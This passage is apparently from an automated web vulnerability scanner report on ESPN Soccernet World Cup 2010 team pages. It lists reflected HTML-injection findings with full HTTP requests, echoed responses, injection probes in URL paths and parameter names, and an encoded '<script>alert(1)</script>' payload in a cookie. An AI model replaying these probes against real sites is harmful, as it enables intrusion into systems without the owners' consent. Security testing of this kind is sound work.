GET /worldcup2010/team/_/team/482/portugal1efcc"><a>d926d468a72 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:26:53 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:26:53 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:31:53 GMT Content-Length: 81605 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Portugal Football / ...[SNIP]... <a href="/worldcup2010/team?team=482&_slug_=portugal1efcc"><a>d926d468a72&topId=804233&linktext=Portugal+depart+after+Spain+defeat"> ...[SNIP]...
2.96. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/482/portugal
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9668"><a>dbe5bd058c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/482/portugal?c9668"><a>dbe5bd058c5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:23:26 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:23:26 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Cache-Expires: Sat, 06 Nov 2010 23:28:26 GMT Content-Length: 81713 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Portugal Football / ...[SNIP]... <a href="/worldcup2010/team?team=482&c9668"><a>dbe5bd058c5=1&_slug_=portugal&c9668"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94792"><a>24dd3ae9355 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4860/north-korea94792"><a>24dd3ae9355 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:05 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:05 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 23:33:05 GMT Content-Length: 81813 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>North Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4860&_slug_=north-korea94792"><a>24dd3ae9355&topId=803573&linktext=North+Korea+coach+proud+of+players"> ...[SNIP]...
2.98. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/4860/north-korea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85746"><a>c9e9c662c34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4860/north-korea?85746"><a>c9e9c662c34=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:23:57 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:23:57 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Cache-Expires: Sat, 06 Nov 2010 23:28:57 GMT Content-Length: 81921 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>North Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4860&85746"><a>c9e9c662c34=1&_slug_=north-korea&85746"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced83"><a>be36cbbeb72 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/624/algeriaced83"><a>be36cbbeb72 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:10 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:13:10 GMT Content-Length: 81717 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Algeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=624&_slug_=algeriaced83"><a>be36cbbeb72&topId=795940&linktext=Saifi+accused+of+slapping+journalist"> ...[SNIP]...
2.100. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/624/algeria
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d7f4"><a>1a4281499ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/624/algeria?9d7f4"><a>1a4281499ae=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:07 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:07 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sat, 06 Nov 2010 23:12:07 GMT Content-Length: 81825 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Algeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=624&9d7f4"><a>1a4281499ae=1&_slug_=algeria&9d7f4"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f74e2"><a>61cba004527 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/627/japanf74e2"><a>61cba004527 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:19:24 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:19:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 23:24:24 GMT Content-Length: 81475 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Japan Football / So ...[SNIP]... <a href="/worldcup2010/team?team=627&_slug_=japanf74e2"><a>61cba004527&topId=804089&linktext=Japan+search+for+new+boss"> ...[SNIP]...
2.102. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/627/japan
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f5b1"><a>ddd77a815e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/627/japan?7f5b1"><a>ddd77a815e5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:15:11 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:15:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 23:20:11 GMT Content-Length: 81583 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
